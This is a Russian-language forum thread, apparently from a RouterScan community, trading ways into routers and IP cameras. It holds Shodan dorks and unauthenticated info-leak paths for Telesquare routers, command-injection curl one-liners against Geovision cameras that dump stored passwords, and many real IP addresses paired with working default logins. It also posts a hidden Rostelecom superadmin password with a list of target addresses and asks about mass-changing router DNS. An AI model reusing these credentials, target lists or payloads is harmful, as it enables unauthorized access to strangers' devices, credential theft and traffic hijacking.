эксплойт от 22.12.2017 на роутер Telesquare Router SDT-CS3B1. кажется в роутерскане его еще нет (если внимательно смотрел список устройств). Spoiler на шодане дорк SDT-CS3B1 правда большинство роутеров в корее. проверял первый попавшийся на запрос "/wifi2g/basic.shtml" и "/cgi-bin/lte.cgi?Command=getModemStatus" . доступ прошел. /home.html << Version and status info leak (firmware, device, type, modem, lte) /index.html << Version and status info leak (firmware, device, type, modem, lte) /nas/smbsrv.shtml << Samba server settings (workgroup, netbios name) /nas/ftpsrv.shtml << FTP settings /wifi2g/basic.shtml << Wireless settings /admin/status.shtml << Access point status info leak /internet/wan.shtml << WAN settings info leak (wanip, subnet, gateway, macaddr, lteipaddr, dns) /internet/lan.shtml << LAN settings info leak (dhcpip, lanip, macaddr, gateway, subnet, dns) /admin/statistic.shtml << System statistics info leak /admin/management.shtml << System management (account settings, ntp settings, ddns settings) /serial/serial_direct.shtml << Direct serial settings (network connection settings, serverip, port) /admin/system_command.shtml << System command interface /internet/dhcpcliinfo.shtml << DHCP Clients info leak (hostname, macaddr, ipaddr) /admin/upload_firmware.shtml << Router firmware and lte firmware upgrade /firewall/vpn_futuresystem.shtml << VPN settings (udp packet transfer, icmp check) /cgi-bin/lte.cgi?Command=getUiccState << GetUiccState() /cgi-bin/lte.cgi?Command=getModemStatus << Modem status info leak /cgi-bin/systemutil.cgi?Command=SystemInfo << System info leak может он не особо распространен.не знаю. но надеюсь, что для поддержки популяции парка устройств может пригодится. а нет-так хоть поразвлекаются любители самообразования коррея вроде не сша. больно бить не будут
в догонку к первому посту ... эксплойт на Geovision IP Cam. от 01.02.2018 Spoiler: exploit уязвимостей много, но на мой взгляд наиболее легко эксплуатируемые PoC will create 'tmp/Login.cgi' with '<!--#include file="SYS_CFG"-->', then Dump All Settings, including login and passwords in clear text by accessing the created Login.htm curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION&password=;echo "<!--#include file="SYS_CFG"-->">tmp/Login.htm;&data_type=1&attachment=1&channel=1&secret=1&key=PWNED" ; curl -v "http://192.168.57.20:80/ssi.cgi/tmp/Login.htm" Unathorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET) curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi" шодан дорк Geovision кому интересно, полное описание и еще куча багов https://cxsecurity.com/issue/WLB-2018020023 может binarymaster с @Felis-Sapiens (если посчитают нужным и будут иметь свободное время) найдут способ и эту железку добить под роутерскан
46.251.7.32:8080 admin:admin какой-то DS-Link (вроде уличные роутеры) определяется как ZTE WebProc и больше инфы нет. 46.251.56.168 user:user определяется как Dual Band WLAN Access Point на самом деле Cgates R7900-A3 инфу пока не берет. 46.251.32.95 root:admin определяется AirStation является BUFFALO WHR-HP-GN инфу не берет 109.172.213.126 admin:admin определяется как httpd а он LB-LINK WRFT-2205-11N-5357-EN-1.0.0 109.172.196.109:8080 пароль пустой определяется как Seems to be LevelOne Broadband Router сам Belkin F6D4230 инфу не получает 92.246.145.207 user:user определяет как index.htm на самом деле D-Link DSL2740U инфу не вытаскивает
5.227.121.84 admin:admin определяется как Goahead/2.5.0 PeerSec-MatrixSSL/3.2.1-OPEN сам-же Robustel R3000-3P инфу не видит 5.227.121.12 user:user определяется mobile router сам-же какаято моторола инфу не видит
У меня рац-предложение для секции Wireless Networks в RS(может моветон, не знаю): - поднатужится, и показать свои отчёты MAC-ов, уязвимых для аудита "pixie dust". Естественно, с хотя бы минимальными пруфами(логи), пусть даже и размыленные масками. И думаю, сторонние источники(проверенные), будут кстати.
https://www.exploit-db.com/exploits/43387/?rss https://www.exploit-db.com/exploits/42739/?rss https://www.exploit-db.com/exploits/42740/?rss https://www.exploit-db.com/exploits/42591/?rss https://www.exploit-db.com/exploits/42320/?rss https://www.exploit-db.com/exploits/42323/?rss https://www.exploit-db.com/exploits/43118/?rss https://www.exploit-db.com/exploits/43105/?rss https://www.exploit-db.com/exploits/42739/?rss Может будет полезно )
В прошлом году Ростелеком стала ставить новые роутеры InnboxE70 определяется как Alpha_webserv (InnboxE70) Есть дыра. Скрытый администратор. Логин superadmin. Пароль y_8v&MzwRPXL33. Адреса роутеров. (на всякий случай несколько) Spoiler 5.228.2.227 5.228.7.127 5.228.19.38 5.228.68.58 5.228.70.125 5.228.76.26 5.228.83.111 5.228.89.177 5.228.113.100 5.228.121.210 5.228.139.19 5.228.141.78 5.228.148.120 5.228.149.46 5.228.160.45 5.228.218.87 5.228.237.185 37.204.12.223 37.204.32.20 37.204.54.206 37.204.55.139 37.204.58.19 37.204.99.189 37.204.126.179 37.204.147.133 37.204.149.210 37.204.172.185 37.204.182.97 37.204.192.118 37.204.206.151 37.204.211.126 37.204.234.206 37.204.244.141 46.242.66.67 46.242.67.212 46.242.68.121 46.242.69.44 46.242.69.94 46.242.69.153 46.242.70.74 46.242.77.30 46.242.77.187 46.242.79.225
5.228.176.16 без пароля определяется Boa/0.94.14rc21 (Realtek Semiconductor Corp. | WIRELESS ROUTER) инфу не вытаскивает 37.110.25.108,95.84.228.212 без пароля определяется Boa/0.94.14rc21 (Upvel UR-315BN) инфу не вытаскивает 37.204.27.250 admin:admin определяется как Boa/0.94.14rc21 сам Sapido GR297n инфу не вытаскивает
Извиняюсь заранее за вопрос, который за несколько лет мог здесь уже прозвучать, но он меня очень интересует. Есть ли какой-либо способ менять DNS роутера автоматически, чтобы это делала программа, либо эта, либо еще какая-нибудь? Потому что кроме как писать скрипт на JS под каждый интерфейс ничего в голову не приходит. Или вы знаете о подобных программах, куда можно список запить. Заранее благодарю за ответ.
Смысл? Это TR-069. Вот из-за таких, как вы, мы теряем точки доступа и доступ к сетям. По-хорошему забанить бы вас, только потом ещё сотня таких же придёт.
У меня, что-то не парсятся. Spoiler 5.228.14.225:80 5.228.16.193:443 5.228.17.213:443 5.228.35.122:443 5.228.39.196:443 5.228.62.91:80 user:user отпарсился 5.228.68.58:80 5.228.70.125:80 5.228.71.44:80 5.228.76.26:80 5.228.89.177:80 librouter.dll крайний.